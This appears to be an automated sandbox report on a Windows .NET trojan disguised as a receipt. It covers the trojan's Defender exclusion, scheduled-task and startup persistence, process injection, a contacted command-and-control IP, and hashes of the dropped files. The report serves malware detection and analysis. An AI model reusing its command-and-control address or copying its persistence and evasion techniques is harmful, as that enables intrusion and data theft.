            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\Recaipt202431029.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            Source: Yara match, File source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4558767346.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: Recaipt202431029.exe PID: 5548, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: Recaipt202431029.exe PID: 612, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: JvkAPBBIe.exe PID: 1532, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: JvkAPBBIe.exe PID: 1560, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match, File source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4558767346.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: Recaipt202431029.exe PID: 5548, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: Recaipt202431029.exe PID: 612, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: JvkAPBBIe.exe PID: 1532, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: JvkAPBBIe.exe PID: 1560, type: MEMORYSTR

            ATT&CK matrix (one line per tactic column; a leading number marks a technique flagged for this sample, the other cells are the unflagged matrix entries)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 11 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 111 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 11 Masquerading; 11 Disable or Modify Tools; 131 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 22 Software Packing; 1 Timestomp; 1 DLL Side-Loading
            Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 211 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Input Capture; 11 Archive Collected Data; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 1 Encrypted Channel; 1 Application Layer Protocol; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1580358; Sample: Recaipt202431029.exe; Start date: 24/12/2024; Architecture: WINDOWS; Score: 100)

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures

• Recaipt202431029.exe (started)
  Dropped: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe (PE32); C:\Users\...\JvkAPBBIe.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp912F.tmp (XML); C:\Users\...\Recaipt202431029.exe.log (ASCII)
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  • Recaipt202431029.exe (child, started)
    Network: 172.245.244.69, ports 49710, 5200, AS-COLOCROSSINGUS, United States
    Dropped: C:\Users\user\AppData\Roaming\Notepab .exe (PE32)
  • powershell.exe (started); signature: Loading BitLocker PowerShell Module
    • conhost.exe (started)
    • WmiPrvSE.exe (started)
  • powershell.exe (started)
    • conhost.exe (started)
  • schtasks.exe (started)
    • conhost.exe (started)
• JvkAPBBIe.exe (started)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  • schtasks.exe (started)
    • conhost.exe (started)
  • JvkAPBBIe.exe (started)

Antivirus detection, sample:
Source | Detection | Scanner | Label
Recaipt202431029.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun
Recaipt202431029.exe | 100% | Avira | HEUR/AGEN.1306877
Recaipt202431029.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files:
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | 100% | Avira | HEUR/AGEN.1306877
C:\Users\user\AppData\Roaming\Notepab .exe | 100% | Avira | HEUR/AGEN.1306877
C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Notepab .exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun
C:\Users\user\AppData\Roaming\Notepab .exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun

No Antivirus matches
No Antivirus matches

Antivirus detection, IPs/URLs:
Source | Detection | Scanner | Label
172.245.244.69 | 0% | Avira URL Cloud | safe
            No contacted domains info
Contacted IPs:
Name | Malicious | Antivirus Detection | Reputation
172.245.244.69 | true | Avira URL Cloud: safe | unknown

URLs from memory and binaries:
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Recaipt202431029.exe, 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp; Recaipt202431029.exe, 00000009.00000002.4558767346.00000000030A1000.00000004.00000800.00020000.00000000.sdmp; JvkAPBBIe.exe, 0000000A.00000002.2181051292.0000000003102000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted public IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
172.245.244.69 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1580358
              Start date and time:2024-12-24 11:26:06 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 47s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:17
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Recaipt202431029.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@19/18@0/1
              EGA Information:
              • Successful, ratio: 75%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 407
              • Number of non-executed functions: 17
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 20.12.23.50
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target JvkAPBBIe.exe, PID 1560 because it is empty
• Not all processes were analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: Recaipt202431029.exe
Time | Type | Description
05:27:02 | API Interceptor | 8950098x Sleep call for process: Recaipt202431029.exe modified
05:27:05 | API Interceptor | 38x Sleep call for process: powershell.exe modified
05:27:08 | API Interceptor | 1x Sleep call for process: JvkAPBBIe.exe modified
11:27:05 | Task Scheduler | Run new task: JvkAPBBIe path: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
11:27:12 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab .lnk
Context for AS-COLOCROSSINGUS (other samples seen contacting this ASN):
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | powerpc.nn.elf | malicious | Mirai, Okiru | 23.249.167.71
AS-COLOCROSSINGUS | file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm | 104.168.28.10
AS-COLOCROSSINGUS | dbus.elf | malicious | Unknown | 107.172.88.151
AS-COLOCROSSINGUS | cB1ItKbbhY.msi | malicious | Unknown | 23.94.207.151
AS-COLOCROSSINGUS | tTdMHr6SlJ.dll | malicious | Unknown | 23.94.207.151
AS-COLOCROSSINGUS | e5mIhMkcj5.exe | malicious | Unknown | 23.94.207.151
AS-COLOCROSSINGUS | PVKDyWHOaX.exe | malicious | Unknown | 23.94.207.151
AS-COLOCROSSINGUS | RcFBMph6zu.exe | malicious | Unknown | 23.94.207.151
AS-COLOCROSSINGUS | tTdMHr6SlJ.dll | malicious | Unknown | 23.94.207.151
AS-COLOCROSSINGUS | e5mIhMkcj5.exe | malicious | Unknown | 23.94.207.151
              Process:C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1396
              Entropy (8bit):5.337066511654157
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
              MD5:55A2AF8F9FCA3AE99FBA235D3E16A53F
              SHA1:32F34219599006657BFF0B868257916A0C393AAA
              SHA-256:2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
              SHA-512:F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1396
              Entropy (8bit):5.337066511654157
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
              MD5:55A2AF8F9FCA3AE99FBA235D3E16A53F
              SHA1:32F34219599006657BFF0B868257916A0C393AAA
              SHA-256:2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
              SHA-512:F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
              Malicious:true
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):2232
              Entropy (8bit):5.380805901110357
              Encrypted:false
              SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
              MD5:16AD599332DD2FF94DA0787D71688B62
              SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
              SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
              SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
              Malicious:false
              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):29
              Entropy (8bit):3.598349098128234
              Encrypted:false
              SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
              MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
              SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
              SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
              SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
              Malicious:false
              Preview:....### explorer ###..[WIN]r
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
(The same 60-byte AppLocker test file, with identical hashes and the preview shown above, is recorded seven more times as dropped by C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; those records are identical to the one above.)
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):1582
              Entropy (8bit):5.104796145255017
              Encrypted:false
              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtYxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
              MD5:25CB61A0C8E9EFD57FCC4EAF781BE7B3
              SHA1:4BB162D10D3028A543D2CFAC511770660D98CAB3
              SHA-256:BC6379D7481D70099BA403DB5114B4785A13A6AB1F2BE22C56AD3948AE2BF042
              SHA-512:1CEA50E20CC3D1A839116660BC6AF7FEE7452173281C52424A13A09282D17204455483A57563FFD9CF043E8A13A248BDE223BE102FD3586E29417BC8E01876AE
              Malicious:true
              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
              Process:C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):1582
              Entropy (8bit):5.104796145255017
              Encrypted:false
              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtYxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
              MD5:25CB61A0C8E9EFD57FCC4EAF781BE7B3
              SHA1:4BB162D10D3028A543D2CFAC511770660D98CAB3
              SHA-256:BC6379D7481D70099BA403DB5114B4785A13A6AB1F2BE22C56AD3948AE2BF042
              SHA-512:1CEA50E20CC3D1A839116660BC6AF7FEE7452173281C52424A13A09282D17204455483A57563FFD9CF043E8A13A248BDE223BE102FD3586E29417BC8E01876AE
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):752128
              Entropy (8bit):7.377381110159069
              Encrypted:false
              SSDEEP:12288:jO1tqPiq7EYBnIsLC304C75kt6WG6RF6yRQxgiDkX1pKP/ehdAA:jO1tM3RpUS7o6WG6T2KiAXaiA
              MD5:7B8044F78E70383A436EBBAE2DF47808
              SHA1:002DE1BB6AA1D9EF1A3F107CB7F5615BE50F27A7
              SHA-256:B10E44DDFE6CAFF1127A964D4A5B9EBDBF9E92A24C2A2957E044DD45B14E8967
              SHA-512:F55144EA7F477868ABEB84F558B3E6F670AA1B3B35AD3490B8C6FC54C25033AD04ABA098F2DB0DC601C0F17B88978621800EE79818F00FD0974C9E881B244F42
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 68%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...po................0.................. ... ....@.. ....................................@.....................................O.... ..................................p............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc...............x..............@..B........................H.......d...`.......(....X..({...........................................0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|....
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Dec 24 09:27:08 2024, mtime=Tue Dec 24 09:27:08 2024, atime=Tue Dec 24 09:27:08 2024, length=752128, window=hide
              Category:dropped
              Size (bytes):772
              Entropy (8bit):5.047768663207275
              Encrypted:false
              SSDEEP:12:8Ri4fxIC88CATlsY//b5LuSRs6kOjASNHlDORWMbhmV:85fw8XZRuGlPASLCwMbhm
              MD5:516D1CB1DE7CD26FB9F12BA1E5298BBA
              SHA1:8EEBF3AFE7F8163A9F15005C40E9564499B730C8
              SHA-256:EA0211696A98D837D85138E1188C8636CE4905EE0A09737AD4354EC0A6E1AAE2
              SHA-512:44EE19F1F4EF62DA13C78B583D7F4AC956992625B1BC9D11D19B5318DC395C18986D36CD26BBBF6868BBDAE15C61B1483CC12C8F7D1980C1DB63100221461A81
              Malicious:false
              Preview:L..................F.... ....-.c.U...-.c.U...-.c.U...z......................z.:..DG..Yr?.D..U..k0.&...&...... M.......jZ.U....Jc.U......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y`S....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......YbS..Roaming.@......DWSl.YbS....C.....................`.D.R.o.a.m.i.n.g.....f.2..z...YeS .NOTEPA~1.EXE..J......YeS.YeS..........................#e..N.o.t.e.p.a.b. ...e.x.e.......[...............-.......Z...........R.N......C:\Users\user\AppData\Roaming\Notepab .exe........\.....\.....\.....\.....\.N.o.t.e.p.a.b. ...e.x.e.`.......X.......618321...........hT..CrF.f4... .d.2=.b...,...W..hT..CrF.f4... .d.2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):752128
              Entropy (8bit):7.377381110159069
              Encrypted:false
              SSDEEP:12288:jO1tqPiq7EYBnIsLC304C75kt6WG6RF6yRQxgiDkX1pKP/ehdAA:jO1tM3RpUS7o6WG6T2KiAXaiA
              MD5:7B8044F78E70383A436EBBAE2DF47808
              SHA1:002DE1BB6AA1D9EF1A3F107CB7F5615BE50F27A7
              SHA-256:B10E44DDFE6CAFF1127A964D4A5B9EBDBF9E92A24C2A2957E044DD45B14E8967
              SHA-512:F55144EA7F477868ABEB84F558B3E6F670AA1B3B35AD3490B8C6FC54C25033AD04ABA098F2DB0DC601C0F17B88978621800EE79818F00FD0974C9E881B244F42
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 68%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...po................0.................. ... ....@.. ....................................@.....................................O.... ..................................p............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc...............x..............@..B........................H.......d...`.......(....X..({...........................................0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|....
              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.377381110159069
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
